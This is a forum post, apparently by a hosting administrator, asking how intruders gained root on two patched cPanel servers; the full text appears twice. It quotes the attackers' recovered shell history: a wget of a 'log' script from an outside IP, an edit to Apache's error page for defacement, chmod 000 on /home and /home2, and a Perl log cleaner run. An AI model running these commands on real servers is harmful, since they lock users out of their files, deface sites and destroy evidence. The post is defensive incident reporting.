On two completly different cpanel servers, the same hacker or team gained access... (from morocco)
Anyone had an idea how can this be possible?
The two servers were up2date (cpanel and OS), one of it had CSF/LFD (5.32) as well as hardened in many ways, the other doesn´t had CSF, but was running suPHP.
In both the SSH was running on non standard ports.
We already saw more than one with the same issue....
they basically... chmod 000 /home, and edit /usr/local/apache/conf/includes/errordocument.conf the 403 line, to show an hacked html, that is shown on all websites running on the server. Then they run a "log cleaner".
First I thought it could be the CSF bug ... but one of the server doesn´t had it, and the other had it updated already...
We were looking around, and found the attacker IP (41.140.*) was like logged on the whm (per apache logs)...
but we can´t still determine HOW they got the root access.... both servers were updated, and running smooth since the beggining... so we´re afraid it could be a BUG that could affect other clients too.
I´m not telling it´s a cpanel bug... I´m trying to find someone that could actually KNOW what they did, as most logs/history was deleted on this server, we found
Part of the History (as we logged in fast to the server, before they leave) was this:
14 cd /tmp
15 w
16 wget 41.140.110.54/log
17 pico /usr/local/apache/conf/includes/errordocument.conf
18 service httpd restart
19 ls -la /
20 chmod 000 /homechmod 000 /home
21 chmod 000 /home
22 chmod 000 /homechmod 000 /home2
23 chmod 000 /home2
24 perl log
25 perl log
(this last command is the one that clear logs, and they just gone)
But could see they got the file, what file they edited, etc.
looks like this is the only damage done, but if this is bug, they can actually do anything they want, as they were working as ROOT!
BTW similar problem found recently here:
https://forums.cpanel.net/f5/hacking-attempt-problem-help-210052.html
Anyone had an idea how can this be possible?
The two servers were up2date (cpanel and OS), one of it had CSF/LFD (5.32) as well as hardened in many ways, the other doesn´t had CSF, but was running suPHP.
In both the SSH was running on non standard ports.
We already saw more than one with the same issue....
they basically... chmod 000 /home, and edit /usr/local/apache/conf/includes/errordocument.conf the 403 line, to show an hacked html, that is shown on all websites running on the server. Then they run a "log cleaner".
First I thought it could be the CSF bug ... but one of the server doesn´t had it, and the other had it updated already...
We were looking around, and found the attacker IP (41.140.*) was like logged on the whm (per apache logs)...
but we can´t still determine HOW they got the root access.... both servers were updated, and running smooth since the beggining... so we´re afraid it could be a BUG that could affect other clients too.
I´m not telling it´s a cpanel bug... I´m trying to find someone that could actually KNOW what they did, as most logs/history was deleted on this server, we found
Part of the History (as we logged in fast to the server, before they leave) was this:
14 cd /tmp
15 w
16 wget 41.140.110.54/log
17 pico /usr/local/apache/conf/includes/errordocument.conf
18 service httpd restart
19 ls -la /
20 chmod 000 /homechmod 000 /home
21 chmod 000 /home
22 chmod 000 /homechmod 000 /home2
23 chmod 000 /home2
24 perl log
25 perl log
(this last command is the one that clear logs, and they just gone)
But could see they got the file, what file they edited, etc.
looks like this is the only damage done, but if this is bug, they can actually do anything they want, as they were working as ROOT!
BTW similar problem found recently here:
https://forums.cpanel.net/f5/hacking-attempt-problem-help-210052.html